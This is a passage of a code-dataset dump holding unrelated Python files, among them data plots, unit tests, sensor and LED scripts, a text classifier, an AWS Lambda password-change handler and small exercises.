exit(1)\n","sub_path":"UIAutotest/test_report.py","file_name":"test_report.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"148828046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nrain = pd.read_csv('/Users/rs/data/rain.csv')\n\nrain.rename(columns={'0': 'date', '1': 'rain'}, inplace=True)\nrain['date'] = pd.to_datetime(rain['date'])\n\nrain_2017 = rain[rain.date.dt.year == 2017]\n\nrain['year'] = rain.date.dt.year\nrain['month'] = rain.date.dt.month\n\ng1 = sns.relplot('month', 'rain', \n kind = 'line' , \n data = rain[rain.date.dt.year == 2017])\nplt.title('Daily rain (cm), 2017')\ng1 = g1.set_axis_labels('month', 'rain')\n\n\nsns.relplot('month', 'rain', kind = 'line', hue = 'year', legend = False, data = rain)\nplt.title('Unreadable, but pretty graph of rain (cm) by year')\nplt.legend(['2000', '2001', '2002', '2003', '2004', '2005', '2006', \n '2007', '2008', '2009', '2010', '2011', '2012', '2013', \n '2014', '2015', '2016', '2017', '2018'], bbox_to_anchor=(1.05, 1), loc=2)\n\nsns.relplot('month', 'rain', kind = 'line', row = 'year', data = rain)\nplt.title('Daily rain (cm) by year')\n\nsns.relplot('month', 'rain', kind = 'line', col = 'year', col_wrap = 3, data = rain)\nplt.suptitle('Daily rain (cm) by year')\nplt.xlabel('month')\n","sub_path":"Code/Richard/python/rain-data-seaborn-graphs.py","file_name":"rain-data-seaborn-graphs.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"312515286","text":"# -*- coding: utf-8 -*-\n\"\"\"Unit test suite for the models of the application.\"\"\"\n\nimport json\n\nfrom nose.tools import assert_equals, eq_\nfrom sqlalchemy import create_engine\n\nfrom bodhi.models import DBSession, Base\n\n\nclass ModelTest(object):\n \"\"\"Base unit test case for the models.\"\"\"\n\n klass = None\n attrs = {}\n\n def setup(self):\n engine = create_engine('sqlite://')\n DBSession.configure(bind=engine)\n Base.metadata.create_all(engine)\n try:\n new_attrs = {}\n new_attrs.update(self.attrs)\n new_attrs.update(self.do_get_dependencies())\n self.obj = self.klass(**new_attrs)\n DBSession.add(self.obj)\n DBSession.flush()\n return self.obj\n except:\n DBSession.rollback()\n raise\n\n def tearDown(self):\n DBSession.remove()\n\n def do_get_dependencies(self):\n \"\"\" Use this method to pull in other objects that need to be\n created for this object to be built properly.\n \"\"\"\n\n return {}\n\n def test_create_obj(self):\n pass\n\n def test_query_obj(self):\n for key, value in self.attrs.iteritems():\n assert_equals(getattr(self.obj, key), value)\n\n def test_json(self):\n \"\"\" Ensure our models can return valid JSON \"\"\"\n assert json.dumps(self.obj.__json__())\n\n def test_get(self):\n for col in self.obj.__get_by__:\n eq_(self.klass.get(getattr(self.obj, col), DBSession), self.obj)\n","sub_path":"bodhi/tests/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"622907592","text":"# class Solution(object):\ndef twoSum(nums, target): # self,\n if len(nums) <= 1:\n return False\n buff_dict = {}\n for i in range(len(nums)):\n if nums[i] in buff_dict:\n return [buff_dict[nums[i]], i]\n else:\n buff_dict[target - nums[i]] = i\n\n\nif __name__ == '__main__':\n nums = [2,3,4,5,7,10,34,56,17]\n target = [7,9,17,37,50]\n print(nums)\n for t in target:\n result = twoSum(nums, t)\n if result:\n print(t, result, '=', nums[result[0]], '+', nums[result[1]])\n else:\n print(t, ' not in ', nums)\n \n","sub_path":"test-twosums.py","file_name":"test-twosums.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"427383963","text":"import ConfigParser\nimport RPi.GPIO as GPIO\nimport time\nimport Adafruit_DHT\n\n# GPIO Mode (BOARD / BCM) BCM e il numero dopo \"GPIO\nGPIO.setmode(GPIO.BCM)\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('nasProperties.properties')\n\n# set GPIO Pins\ngpio_trigger = int(config.get('raspberryPi', 'hcsr04_1_trigger'))\ngpio_echo = int(config.get('raspberryPi', 'hcsr04_1_echo'))\ngpio_dht22 = config.get('raspberryPi', 'dht22Pin')\n\n\n# set GPIO direction (IN / OUT)\nGPIO.setup(gpio_trigger, GPIO.OUT)\nGPIO.setup(gpio_echo, GPIO.IN)\n\n\ndef distance():\n # set Trigger to HIGH\n GPIO.output(gpio_trigger, True)\n\n # set Trigger after 0.01ms to LOW\n time.sleep(0.00001)\n GPIO.output(gpio_trigger, False)\n\n StartTime = time.time()\n StopTime = time.time()\n\n # save StartTime\n while GPIO.input(gpio_echo) == 0:\n StartTime = time.time()\n\n # save time of arrival\n while GPIO.input(gpio_echo) == 1:\n StopTime = time.time()\n\n # time difference between start and arrival\n TimeElapsed = StopTime - StartTime\n # multiply with the sonic speed (34300 cm/s)\n # and divide by 2, because there and back\n soundspeed = getSonicSpeed()\n distance = (TimeElapsed * soundspeed) / 2\n\n return distance\n\n\ndef getSonicSpeed():\n humidity, temperature = Adafruit_DHT.read_retry(22, gpio_dht22)\n soundspeed = (331.4 + (0.606 * temperature) + (0.0124 * humidity))*100\n\n print(\"temp: \"+str(temperature)+\" hum \"+str(humidity)+\" sound speed: \"+str(soundspeed) + \" cm/s\")\n return soundspeed\n\nif __name__ == '__main__':\n try:\n while True:\n dist = distance()\n print (\"Measured Distance = %.1f cm\" % dist)\n time.sleep(5)\n\n # Reset by pressing CTRL + C\n except KeyboardInterrupt:\n print(\"Measurement stopped by User\")\n GPIO.cleanup()","sub_path":"ultrasonicDistanceWithTempAndHum.py","file_name":"ultrasonicDistanceWithTempAndHum.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"378521840","text":"\n\nimport pandas as pd\nimport numpy as np\nfrom myTools.pdTools.auto_ml_tool.amt_2_3 import Amtl\n\ndata_path = 'train.csv'\ntrain_data = pd.read_csv('train.csv', encoding='ISO-8859-1', low_memory=False)\n\nlist_org = ['Id', 'MSSubClass', 'MSZoning', 'SalePrice']\n#list_org = ['PassengerId', 'Survived', 'Pclass', \"Age\", \"SibSp\", \"Fare\", \"Cabin\"]\none_hot_list =[\"City\"]\n\n\n#n_estimators默认100,max_depth默认3,min_child_weight默认1,gamma默认0,learning_rate默认0.1\ncv_param = {\n 'n_estimators': np.arange(20, 80, 5),\n 'max_depth': np.arange(2, 5, 1),\n 'min_child_weight': np.arange(1, 2, 1),\n 'gamma': np.arange(0.1, 0.2, 0.05),\n 'learning_rate': np.arange(0.1, 0.2, 0.05)\n }\n\npsl = Amtl(train_data, 'Id', 'SalePrice', model='R', fearture_list=None, one_hot_list='off',\n pca_param_s=0.9, pca_param_d=0.9)\npsl.fit()","sub_path":"r_demo/xgb_train.py","file_name":"xgb_train.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"460001234","text":"import copy\nfrom typing import List\nfrom dae.pedigrees.family import FamiliesData, Family\n\n\nclass FamiliesTsvSerializer:\n \"\"\"Class for serializing families into TSV format.\"\"\"\n\n def __init__(self, families: FamiliesData):\n self._families = families\n\n def serialize(self, sep=\"\\t\", columns=None) -> List[str]:\n \"\"\"Serialize families to list of lines with a header.\"\"\"\n if columns is None:\n columns = list(self._families.values())[0].get_columns()\n rows = [f\"{sep.join(columns)}\\n\"]\n for family in self._families.values():\n rows.extend(\n self._serialize_family(family, sep=sep, columns=columns)\n )\n return rows\n\n @staticmethod\n def _serialize_family(family: Family, sep=\"\\t\", columns=None) -> List[str]:\n \"\"\"Serialize family to a list of lines per member.\"\"\"\n if columns is None:\n columns = family.get_columns()\n rows = []\n for member in family.full_members:\n # pylint: disable=protected-access\n record = copy.deepcopy(member._attributes)\n record[\"mom_id\"] = member.mom_id if member.mom_id else \"0\"\n record[\"dad_id\"] = member.dad_id if member.dad_id else \"0\"\n record[\"generated\"] = member.generated \\\n if member.generated else False\n record[\"not_sequenced\"] = member.not_sequenced \\\n if member.not_sequenced else False\n row = []\n for col in columns:\n row.append(str(record[col]))\n rows.append(f\"{sep.join(row)}\\n\")\n return rows\n","sub_path":"dae/dae/pedigrees/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"314042480","text":"import bpy\r\nimport os\r\nfrom . import preset_setup\r\ndef lomo():\r\n preset_setup.preset_setup(preset_name=\"Lomo Enrich\", blend_name=\"Enrich.blend\")\r\n enrich_props = bpy.context.scene.enrich_props\r\n vig = bpy.context.scene.node_tree.nodes['Vignette_E']\r\n vig.inputs[2].default_value = 80\r\n enrich_props.vig_opacity=80\r\n\r\n vig_blur = vig.node_tree.nodes[\"Blur\"]\r\n vig_blur.factor_x = 20\r\n vig_blur.factor_y = 20\r\n vig_blur.inputs[1].default_value = 0.9\r\n\r\n vig_mask = vig.node_tree.nodes[\"Ellipse Mask\"]\r\n vig_mask.y = 0.5\r\n vig_mask.x = 0.5\r\n enrich_props.vig_location_y = 0.5\r\n enrich_props.vig_location_x = 0.5\r\n vig_mask.width = 0.866\r\n vig_mask.height = 0.465\r\n vig_mask.inputs[1].default_value = 1.0\r\n","sub_path":"All_In_One/addons/Enrich_Presets/lomo.py","file_name":"lomo.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"8757131","text":"#!/usr/bin/env python\r\n#\r\n# sdr_script - Common User Interface classes - input level\r\n# \r\n# User: bob\r\n# Date: 29/05/16\r\n# Copyright (C) 2013 by G3UKB Bob Cowdery\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n# \r\n# The author can be reached by email at: \r\n# bob@bobcowdery.plus.com\r\n#\r\n\r\n# System imports\r\nimport os,sys\r\nfrom PyQt4 import QtCore, QtGui\r\n\r\n# Application imports\r\nfrom common.defs import *\r\n\r\n\"\"\"\r\n\r\nMain class for input level indication under VOX control\r\n\r\n\"\"\"\r\nclass Level(QtGui.QWidget):\r\n \r\n def __init__(self, w, max_level, trigger_level):\r\n \"\"\"\r\n Constructor\r\n \r\n Arguments:\r\n max_level -- maximum input level\r\n trigger_level -- the level at which VOX will trigger\r\n \r\n \"\"\"\r\n \r\n super(Level, self).__init__(w)\r\n \r\n # Instance params\r\n self.__max_level = max_level\r\n \r\n # Drawing implements\r\n self.__font = QtGui.QFont('Times', 8)\r\n self.__trigger_pen = QtGui.QPen(QtGui.QColor(75,150,113))\r\n self.__level_pen = QtGui.QPen(QtGui.QColor(182,28,5))\r\n self.__level_pen.setWidth(4)\r\n \r\n # Drawing metrics\r\n self.__span = 235\r\n self.__trigger_st_x = 10\r\n self.__trigger_end_x = 245\r\n self.__level_st_x = 10\r\n self.__level_end_x = 10\r\n self.__trigger_y = 5\r\n self.__level_y = 14 \r\n self.__level_per_pixel = float(self.__span)/ float(self.__max_level) \r\n self.__trigger_level = int(trigger_level * L_MAX_TX_AUDIO_IN/100 * self.__level_per_pixel)\r\n self.__trigger_px = self.__level_per_pixel * self.__trigger_level\r\n \r\n def paintEvent(self, e):\r\n \"\"\"\r\n Render the control\r\n \r\n Arguments:\r\n e -- event\r\n \r\n \"\"\"\r\n \r\n # Start painting]\r\n qp = QtGui.QPainter()\r\n qp.begin(self)\r\n \r\n # Paint a bar with the trigger indicator\r\n qp.setPen(self.__trigger_pen)\r\n qp.drawLine(self.__trigger_st_x, self.__trigger_y, self.__trigger_end_x, self.__trigger_y)\r\n qp.drawLine(self.__trigger_st_x + self.__trigger_level, self.__trigger_y - 5, self.__trigger_st_x + self.__trigger_level, self.__trigger_y + 5)\r\n # Paint the level indicator\r\n qp.setPen(self.__level_pen)\r\n qp.drawLine(self.__level_st_x, self.__level_y, self.__level_end_x, self.__level_y)\r\n # End painting\r\n qp.end()\r\n \r\n def update_level(self, level):\r\n \"\"\"\r\n Update the level\r\n \r\n Arguments:\r\n level -- level as raw 16 bit value\r\n \r\n \"\"\"\r\n \r\n self.__level_end_x = int((level * self.__level_per_pixel) + self.__level_st_x)\r\n self.update()\r\n \r\n def update_trigger(self, trigger_level):\r\n \"\"\"\r\n Update the trigger level\r\n \r\n Arguments:\r\n trigger_level -- trigger level as 16 bit value\r\n \r\n \"\"\"\r\n \r\n self.__trigger_level = int(trigger_level * L_MAX_TX_AUDIO_IN/100 * self.__level_per_pixel)\r\n self.update()\r\n","sub_path":"SdrScript/python/ui/common/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"365399551","text":"#! python 3\r\n# madLibs.py\r\nimport os, re\r\n\r\n# Open file\r\ntextFile = open(r'C:\\Users\\Mack W\\Documents\\7 Python\\pyFiles\\Automate the Boring Stuff with Python\\Chapter 8 Files\\Practice Projects\\madLibsPrompt.txt')\r\n\r\n# Find ADJECTIVE, NOUN, ADVERB, and VERB in the file\r\ngrammar = re.compile(r'ADJECTIVE|NOUN|ADVERB|VERB')\r\nmatchObject = grammar.findall(textFile.read())\r\n\r\n# Prompt user to replace them\r\nfor i in range(len(matchObject)):\r\n if matchObject[i] == 'ADJECTIVE':\r\n print('Enter an adjective: ', end = '')\r\n adjective += [input()] \r\n elif matchObject[i] == 'NOUN':\r\n print('Enter a noun: ', end = '')\r\n noun += [input()]\r\n elif matchObject[i] == 'ADVERB':\r\n print('Enter an adverb: ', end = '')\r\n adverb += [input()]\r\n elif matchObject[i] == 'VERB':\r\n print('Enter a verb: ', end = '')\r\n verb += [input()]\r\n \r\nprint(adjective)\r\nprint(noun)\r\nprint(verb)\r\n\r\n# Create text file with replacements\r\n\r\n# Always close your files :)\r\ntextFile.close()\r\n","sub_path":"Chapter 8 Files/Practice Projects/madLibs.py","file_name":"madLibs.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"298857601","text":"from __future__ import print_function\nimport boto3\nimport json\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\n\nprint('Loading function - Trocar senha hotel')\n_dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n_table = _dynamodb.Table('Hotel')\n\n# Tratamento da mensagem de retorno\ndef respond(err, res=None):\n _return = {\n 'statusCode': '400' if err else '200',\n 'body': json.dumps(err) if err else json.dumps(res),\n 'headers': {\n 'Content-Type': 'application/json',\n },\n }\n\n print(_return)\n return _return\n\n# Limpar dados\ndef removeCampoVazio(dados):\n dados_limpos = dict((k, v) for k, v in dados.items() if v)\n return dados_limpos\n\n#Validar Token\ndef validarToken(_token):\n\n _response = _table.scan(\n FilterExpression=Attr('usuario.registro_acesso').eq(_token)\n )\n return _response\n\n# Alterar informações de Login\ndef alterarSenha(_cnpj, _usuario):\n\n _table.update_item(\n Key={\n 'cnpj': _cnpj\n },\n UpdateExpression=\"set usuario = :0\",\n ExpressionAttributeValues={\n ':0': _usuario\n }\n )\n\ndef lambda_handler(event, context):\n # Limpar dados\n event = removeCampoVazio(event)\n\n #Validacao - token\n if 'token' not in event:\n return respond(\"O token obrigatório.\")\n else:\n _token = event['token']\n\n #Validacao - nome\n if 'novasenha' not in event:\n return respond(\"A nova senha é obrigatório.\")\n else:\n _novasenha = event['novasenha']\n\n # Validar Token\n try:\n _hotel = validarToken(_token)\n\n except ClientError as e:\n _message_err = \"Error ao efetuar a validação do token: \" + e.response['Error']['Message']\n return respond(_message_err)\n\n if _hotel['Count'] > 0:\n\n # Alterar Senha\n try:\n _usuario = _hotel['Items'][0]['usuario']\n _usuario['senha'] = _novasenha\n alterarSenha(_hotel['Items'][0]['cnpj'], _usuario)\n\n except ClientError as e:\n _message_err = \"Error ao efetuar a alteração da senha: \" + e.response['Error']['Message']\n return respond(_message_err)\n\n\n else:\n _message_err = \"Não foi possível encontrar o hotel através do token informado.\"\n return respond(_message_err)\n\n return respond(None, \"Alteração efetuada com sucesso\")\n","sub_path":"1in/TrocarSenha.py","file_name":"TrocarSenha.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"612081770","text":"import sys\nimport time\nimport multiprocessing\n\nfrom BaseClasses.EngineProcess import EngineProcess\nimport paho.mqtt.client as mqtt\n\n\nclass Engine:\n\n def __init__(self):\n self.isRunning = False\n self.brightness = 100\n self.subengines = []\n self.processes = []\n self.frames = {}\n self.controller = None\n self.pixellength = 0\n self.mqtt_client = None\n self.pretopic = None\n\n def startMQTT(self, pretopic, host=\"localhost\", port=1883, timeout=60):\n self.pretopic = pretopic\n self.mqtt_client = mqtt.Client()\n self.mqtt_client.on_message = self.on_message\n self.mqtt_client.connect(host, port, timeout)\n self.mqtt_client.subscribe(pretopic + \"/effekt/#\")\n self.mqtt_client.subscribe(pretopic + \"/command\")\n self.mqtt_client.subscribe(pretopic + \"/color/#\")\n self.mqtt_client.loop_start()\n\n def setControler(self, pControler):\n self.controller = pControler\n\n def on_message(self, client, userdata, msg):\n if not self.isRunning:\n print(\"Recieved MQTT message but could not be processed, because Engine is not running\")\n return\n topic = msg.topic\n if topic == self.pretopic + \"/command\": # Command\n self.on_command(msg.payload, None)\n\n elif topic.startswith(self.pretopic + \"/color/\"): # Color change\n sub_topic = topic[len(self.pretopic) + 7:]\n if sub_topic == \"brightness\":\n self.brightness = int(msg.payload)\n\n elif topic.startswith(self.pretopic + \"/effekt/\"): # Effect Command\n sub_topic = topic[len(self.pretopic) + 8:]\n for process in self.processes:\n if sub_topic.startswith(process.name + \"/\"):\n effect_topic = sub_topic[len(process.name) + 1:]\n if effect_topic == \"enable\":\n process.isEnabled = msg.payload.lower() in (\"true\", \"t\", \"1\", \"on\")\n elif process.parent is not None:\n process.parent.send(\"m:\" + effect_topic + \"/\" + msg.payload)\n\n def on_command(self, command, attributes):\n if command == \"update\":\n pass\n elif command == \"reset\":\n self.controller.setFrame([[0, 0, 0]] * self.pixellength)\n\n def addSubEngine(self, pSub, pIsEnabled):\n if not self.isRunning:\n self.subengines.append(pSub)\n self.processes.append(\n EngineProcess(pSub, pSub.mqttTopic, None, None, pIsEnabled, pSub.isCompressed, pSub.compressor)\n )\n else:\n print('Could not add SubEngine, because Engine is already running')\n\n def run(self):\n try:\n self.isRunning = True\n self.controller.setup()\n self.pixellength = self.controller.pixellength\n while self.isRunning:\n fr = time.clock()\n frames = [[-1, -1, -1]] * self.pixellength\n for process in self.processes:\n if process.isEnabled and process.parent is not None and process.process is not None:\n process.parent.send(\"f\")\n for process in self.processes:\n if process.isEnabled and process.parent is None and process.process is None:\n self.startSubEngine(process.subengine)\n elif not process.isEnabled and process.parent is not None and process.process is not None:\n self.terminateSubEngine(process.subengine)\n elif process.isEnabled:\n frame = self.frames[process.name]\n if process.parent.poll():\n if process.isCompressed:\n frame = process.compressor.decompressFrame(process.parent.recv())\n else:\n frame = process.parent.recv()\n self.frames[process.name] = frame\n for i in range(len(frames)):\n if frames[i] == [-1, -1, -1]:\n frames[i] = frame[i]\n brPercent = float(self.brightness) / 100\n completeFrame = []\n for i in range(len(frames)):\n color = []\n for a in frames[i]:\n color.append(int(max(0, a) * brPercent))\n completeFrame.append(color)\n self.controller.setFrame(completeFrame)\n fr = time.clock() - fr\n if fr <= 0.02:\n time.sleep(0.02 - fr)\n\n except KeyboardInterrupt:\n self.terminateAll()\n except:\n print(\"Unexpected Error in Engine:\", sys.exc_info()[0])\n print(\"Terminating all SubEngines!\")\n self.terminateAll()\n print(\"All SubEngines terminated.\")\n print(\"Shutting down Engine.\")\n\n def startSubEngine(self, engineProcess):\n if self.isRunning:\n if engineProcess.subengine.isRunning:\n print(\"Could not start SubEngine, because SubEngine is already running\")\n return\n parent, child = multiprocessing.Pipe()\n process = multiprocessing.Process(target=engineProcess.subengine.run)\n engineProcess.subengine.configure(child)\n engineProcess.process = process\n engineProcess.parent = parent\n engineProcess.isEnabled = True\n process.start()\n self.frames[engineProcess.name] = ([[-1, -1, -1]] * self.pixellength)\n else:\n print(\"Could not start SubEngine, because Engine is not running\")\n\n def terminateSubEngine(self, process):\n if not process.isEnabled:\n process.parent = None\n process.process = None\n return\n if process.parent is not None:\n print(\"Terminate Process... \" + process.name)\n process.parent.send(\"t\")\n if process.process is not None and process.process.is_alive:\n print(\"Join Process... \" + process.name)\n process.process.join()\n process.parent.close()\n process.process = None\n process.parent = None\n process.isEnabled = False\n\n def terminateAll(self):\n self.isRunning = False\n for process in self.processes:\n self.terminateSubEngine(process)\n print(\"Done!\")\n","sub_path":"BaseClasses/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"620780630","text":"import pandas as pd\nimport numpy as np\nimport re\nimport jieba\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression \nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.multiclass import OneVsRestClassifier\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.pipeline import make_pipeline\n\nfrom sklearn import svm\nfrom sklearn.naive_bayes import MultinomialNB\n\nimport os\nos.chdir('C:\\\\Users\\\\zhaohaibo\\\\Desktop')\n\n\ndef split(data):\n data = data.reset_index(drop=True)\n split_content = data.content.apply(lambda x:re.sub(' ','',x))\n split_content = split_content.apply(lambda x:re.sub('\\xa0','',x))\n split_content = split_content.astype('str').apply(lambda x: jieba.lcut(x))\n # 导入停用词\n stop = pd.read_csv('stop.txt', encoding = 'utf-8', sep = 'zhao', header = None,engine = 'python') #sep:分割符号(需要用一个确定不会出现在停用词表中的单词)\n document = []\n for i in split_content.index:\n temp = [k for k in split_content[i] if k not in stop.values]\n strr = ' '.join(temp)\n document.append(strr)\n if(i % 1000 == 0):\n print(\"Complete --- {} / {} \".format(i, len(split_content)))\n return document\n\n\n\nprint(\"(1) load texts...\")\nX = pd.read_csv('train.csv', usecols=[0,1])\ny = pd.read_csv('train.csv',usecols=[2])\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=666, shuffle = False)# shuffle默认为True\nX_test = X_test.reset_index(drop=True)\ny_train = y_train.reset_index(drop=True)\ny_test = y_test.reset_index(drop=True)\n# X_train = pd.read_csv('train.csv', usecols=[1])\n# y_train = pd.read_csv('train.csv',usecols=[2])\n# X_test = pd.read_csv('test_public.csv',usecols=[1])\ntrain_texts = split(X_train)\ntest_texts = split(X_test)\ntrain_labels = y_train\ntest_labels = y_test\n\nall_text = train_texts + test_texts\n\nprint (\"(2) doc to var...\")\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer \ncount_v0= CountVectorizer(); \ncounts_all = count_v0.fit_transform(all_text);\ncount_v1= CountVectorizer(vocabulary=count_v0.vocabulary_); \ncounts_train = count_v1.fit_transform(train_texts); \nprint (\"the shape of train is {}\".format(counts_train.shape))\ncount_v2 = CountVectorizer(vocabulary=count_v0.vocabulary_); \ncounts_test = count_v2.fit_transform(test_texts); \nprint (\"the shape of test is {}\".format(counts_test.shape))\n \ntfidftransformer = TfidfTransformer(); \ntrain_data = tfidftransformer.fit(counts_train).transform(counts_train);\ntest_data = tfidftransformer.fit(counts_test).transform(counts_test); \n\nx_train = train_data\ny_train = train_labels\nx_test = test_data\ny_test = test_labels\n\n\ndef GridsearchCV():\n# param_grid = [\n# {\n# 'learning_rate':[0.01,0.05,0.1],\n# 'n_estimators':[i for i in range(3000,5000,500)]\n# }]\n# clf = XGBClassifier()\n# grid_search = GridSearchCV(clf, param_grid,n_jobs=-1)\n# grid_search.fit(X_train,y_train)\n param_grid = { 'max_depth':range(3,10,2), 'min_child_weight':range(1,6,2)}# param_grid = {# 'max_depth':[7,8],# 'min_child_weight':[4,5]# }\n gsearch1 = GridSearchCV(estimator = XGBClassifier(),param_grid=param_grid,cv=5)\n gsearch1.fit(X_train, y_train)\n grid_search.best_score_\n grid_search.best_estimator_\n\n\nprint (\"(3) XGBoost...\")\nfrom xgboost import XGBClassifier\nmodel = XGBClassifier(learning_rate =0.2)\nmodel.fit(x_train, y_train)\npreds = model.predict(x_test)\nnum = 0\npreds = preds.tolist()\nfor i,pred in enumerate(preds):\n if(pred == y_test.subject[i]):\n num += 1\nprint (\"\\n\\n precision_score:{}\".format(float(num) / len(preds)))\n\n\npreds = pd.Series(preds)\nX_test['subject'] = pd.Series(preds)\nX_test['sentiment_value'] = 0\nX_test['sentiment_word'] = None\nX_test = X_test.drop(['content'],axis=1)\nX_test.to_csv('result_svm.csv',index=False)\n\n\n\n\n\n\n \n\n\n\n\n","sub_path":"机器学习方法/xgboost.py","file_name":"xgboost.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"419885736","text":"# time O(n), space O(1)\n# tip: use index -1 and n to represent the boundaries to make things easier\nclass Solution(object):\n def maxDistToClosest(self, seats):\n \"\"\"\n :type seats: List[int]\n :rtype: int\n \"\"\"\n pre = -1 # the id of the previous seat that has person\n max_dist = 0\n for i, num in enumerate(seats):\n if num == 1:\n if pre == -1:\n dist = i\n else:\n dist = (i-pre)//2\n max_dist = max(max_dist, dist)\n pre = i\n \n if len(seats)-1-i <= max_dist: # early termination, much faster\n return max_dist\n \n return max(max_dist, len(seats)-1-pre) # don't miss the rightmost seat\n \n ","sub_path":"0849. Maximize Distance to Closest Person.py","file_name":"0849. Maximize Distance to Closest Person.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"59680409","text":"import csv\nimport map_1\n\n# Function to print all rows from the three service listings (housing_scv, health_scv, and job_scv)\ndef printservice(serv_list):\n print(serv_list[0].title)\n for serv in serv_list:\n print(serv.printme()) \n\n\nclass User: # class is like an template\n def __init__(self, first, last, sex_at_birth, gender_identity, age, email, prob_parl):\n self.first = first\n self.last = last \n self.age = age\n self.email = first + '.' + last + '@tsr.org'\n self.prob_parl = prob_parl\n self.sex_at_birth = sex_at_birth\n self.gender_identity = gender_identity\n # if self.age < 18 or self.age > 90:\n # print(\"Invalid age specified. Execution cannot continue, exiting.\")\n # exit\n\n def fullname(self):\n return '{} {}, Email: {} {}'.format(self.first, self.last, self.email.lower(), self.prob_parl)\n\nclass services:\n def __init__(self, name, website, description, location, phone, email):\n self.name = name\n self.website = website\n self.description = description\n self.location = location\n self.phone = phone\n self.email = email \n\nclass housing_scv(services):\n def __init__(self, name, website, description, location, phone, email, income, duration, single_occupancy, comm_housing):\n super().__init__(name, website, description, location, phone, email) \n self.income = income\n self.duration = duration\n self.single_occpancy = single_occupancy\n self.comm_housing = comm_housing\n def printme(self):\n print('\"',self.name, self.website, self.description, self.location, self.phone, self.email, self.income, self.duration, self.single_occpancy, self.comm_housing,'\"')\n title = 'name, wesite, description, location, phone, email, email, income, duration, single_occupancy, comm_housing'.title()\n\nclass job_scv(services):\n def __init__(self, name, website, description, location, phone, email, full_time, part_time, temporary, permanent):\n super().__init__(name, website, description, location, phone, email) \n self.full_time = full_time\n self.part_time = part_time\n self.temporary = temporary\n self.permanent = permanent\n def printme(self):\n print('\"',self.name, self.website, self.description, self.location, self.phone, self.email, self.full_time, self.part_time, self.temporary, self.permanent,'\"')\n title = 'name, wesite, description, location, phone, email, full_time, part_time, temporary, permanent'.title()\n\nclass health_scv(services):\n def __init__(self, name, website, description, location, phone, email, primary_care, insurance):\n super().__init__(name, website, description, location, phone, email)\n self.primary_care = primary_care\n self.insurance = insurance\n def printme(self):\n print('\"',self.name, self.website, self.description, self.location, self.phone, self.email, self.primary_care, self.insurance,'\"')\n title = 'name, wesite, description, location, phone, email, primary_care, insurance'.title()\n\n# Ask the user for first, last, age, email, prob_parl and save the user answers in variables (Prompt user ---> Google)\ndef getUser(): \n first_name = input('What is your first name?: ')\n last_name = input('What is your Last name?: ')\n sex_at_birth = input('Sex at Birth - Male/ or Female?: ')\n gender_identity = input('Gender Identity: Heterosexual, Gay, Lesbian, Transgender, or Non-binary?: ')\n age = input('How old are you?: ')\n email_address = input('What is your email address?: ')\n release_status = input('Are you currently on probation or parole?: ')\n print()\n user = User(first_name, last_name, sex_at_birth, gender_identity, age, email_address, release_status)\n return user\n\ndef read_health():\n health_scvs = []\n title = \"\"\n# open the csv file\n with open('services_csv_files\\health_scvs.csv') as csv_file:\n 